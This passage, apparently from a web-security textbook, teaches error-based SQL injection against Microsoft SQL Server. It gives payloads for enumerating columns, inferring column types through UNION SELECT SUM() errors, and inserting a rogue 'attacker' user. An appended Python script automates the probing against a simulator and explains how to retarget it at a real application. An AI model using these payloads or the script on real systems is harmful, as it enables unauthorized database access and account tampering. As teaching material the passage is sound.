This message discloses the name of the second column being returned by
the query. You can continue inserting the name of each enumerated column
into the attack string, eventually arriving at the following attack string:
' group by users.ID, users.username, users.password, users.privs having 1=1--
Submitting this value does not result in any error message. This confirms
that you have now enumerated all of the columns being returned by the query,
and the order in which they appear.
The next step is to determine the data types of each column. Using the
information already obtained, you can supply the following input:
' union select sum(username) from users--
This input attempts to perform a second query and combine the results with
those of the original. It generates the following error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
This error occurs because the database carried out the injected query before
attempting to combine the results with those of the original. The SUM function
performs a numeric sum, and takes numeric type data as its input. Because the
username column is a string type, this causes an error, and the message
discloses that the username column is of the specific data type varchar.
Submitting the same input with the ID column produces a different error
message:
' union select sum(ID) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists.
This error indicates that the SUM function was successful, and a problem
arose only at the point where the database attempted to combine the single
column returned by the injected query with the four columns returned by the
original query. This effectively confirms that the ID column is a numeric
data type (one that SUM accepts as an argument).
You can repeat this test on each of the fields of the query to confirm their
data types. Having done this, you now have sufficient information to extract
arbitrary information from the users table, and to insert your own data into it.
For example, to add a new user account with arbitrary ID and privs values,
you can submit the following as either of the vulnerable fields (the values
are supplied in the column order enumerated above, and the attack relies on
the database executing a second, batched statement after the semicolon,
which MS-SQL permits):
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
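As an added example (not part of the original text), the following Python script automates the two probing steps just described: it grows the GROUP BY list until the HAVING probe stops producing an error, then sends a UNION SELECT SUM() probe per column and classifies each column from the error that comes back. The target is a constructed simulator of a SQL Server backend with the four-column users table from this section; to run it against a real application, replace simulated_target with a function that submits the payload through the vulnerable field and returns the response body. The column-enumeration message (SQL Server message 8120), the "Operand data type ... is invalid for sum operator" message (8117) and the "Invalid column name" message (207) are standard SQL Server texts not quoted on this page; on that basis the classifier generalizes the SUM probe beyond varchar to datetime and bit columns, which SUM also rejects.

```python
import re
from typing import Callable, Dict, List

# Constructed schema for the simulated target; the column order matches the
# enumeration on the page (users.ID, users.username, users.password, users.privs).
SIMULATED_SCHEMA: Dict[str, str] = {
    "ID": "int", "username": "varchar", "password": "varchar", "privs": "int",
}

# Error texts the probes provoke. The SUM/varchar and UNION messages are the
# ones quoted on the page; 8120, 8117 and 207 are standard SQL Server texts
# assumed here for the simulator.
MSG_GROUP_BY = ("Column '{table}.{col}' is invalid in the select list because it is "
                "not contained in either an aggregate function or the GROUP BY clause.")
MSG_SUM_STRING = ("The sum or average aggregate operation cannot take a {type} "
                  "data type as an argument.")
MSG_SUM_OPERAND = "Operand data type {type} is invalid for sum operator."
MSG_UNION = ("All queries in an SQL statement containing a UNION operator must "
             "have an equal number of expressions in their target lists.")
MSG_BAD_COLUMN = "Invalid column name '{col}'."


def simulated_target(payload: str, table: str = "users") -> str:
    """Stand-in for the vulnerable page: return the database error text that
    the injected payload would provoke, or '' when the query succeeds."""
    m = re.search(r"sum\((\w+)\)", payload, re.I)
    if m:
        col = m.group(1)
        col_type = SIMULATED_SCHEMA.get(col)
        if col_type is None:
            return MSG_BAD_COLUMN.format(col=col)
        if col_type in ("varchar", "nvarchar", "char", "nchar", "text"):
            return MSG_SUM_STRING.format(type=col_type)
        if col_type in ("datetime", "bit", "uniqueidentifier"):
            return MSG_SUM_OPERAND.format(type=col_type)
        return MSG_UNION  # SUM succeeded; the failure moves to the UNION step
    if re.search(r"having 1=1", payload, re.I):
        m = re.search(r"group by (.*?) having", payload, re.I)
        grouped = {c.strip().split(".")[-1] for c in m.group(1).split(",")} if m else set()
        for col in SIMULATED_SCHEMA:  # first selected column not yet grouped
            if col not in grouped:
                return MSG_GROUP_BY.format(table=table, col=col)
        return ""  # every column is in GROUP BY: no error, enumeration done
    return ""


def enumerate_columns(send: Callable[[str], str], table: str = "users",
                      limit: int = 32) -> List[str]:
    """Step 1: extend the GROUP BY list with each column name the error
    discloses, until the HAVING probe returns no error."""
    cols: List[str] = []
    for _ in range(limit):
        grouped = ", ".join(f"{table}.{c}" for c in cols)
        clause = f"group by {grouped} " if cols else ""
        err = send(f"' {clause}having 1=1--")
        if not err:
            return cols
        m = re.search(r"Column '(?:\w+\.)?(\w+)' is invalid in the select list", err)
        if not m:
            raise RuntimeError(f"unexpected response: {err}")
        cols.append(m.group(1))
    raise RuntimeError("column enumeration did not converge")


def probe_type(send: Callable[[str], str], col: str, table: str = "users") -> str:
    """Step 2: UNION SELECT SUM(col). SUM runs before the UNION is reconciled,
    so the error reveals whether the column's type was accepted by SUM."""
    err = send(f"' union select sum({col}) from {table}--")
    m = re.search(r"cannot take a (\w+) data type", err)
    if m:
        return m.group(1)  # string type named in the message, e.g. varchar
    m = re.search(r"Operand data type (\w+) is invalid for sum operator", err)
    if m:
        return m.group(1)  # e.g. datetime or bit, which SUM also rejects
    if "equal number of expressions" in err:
        return "numeric"  # SUM succeeded; only the column-count check failed
    return "unknown"


def fingerprint(send: Callable[[str], str], table: str = "users") -> Dict[str, str]:
    """Run both steps and map each enumerated column to its inferred type."""
    return {c: probe_type(send, c, table) for c in enumerate_columns(send, table)}


if __name__ == "__main__":
    for col, col_type in fingerprint(simulated_target).items():
        print(f"{col:10s} {col_type}")
```

Against the simulator this yields ID and privs as numeric and username and password as varchar, which is the information needed to build the INSERT statement above with correctly typed values in the right column order.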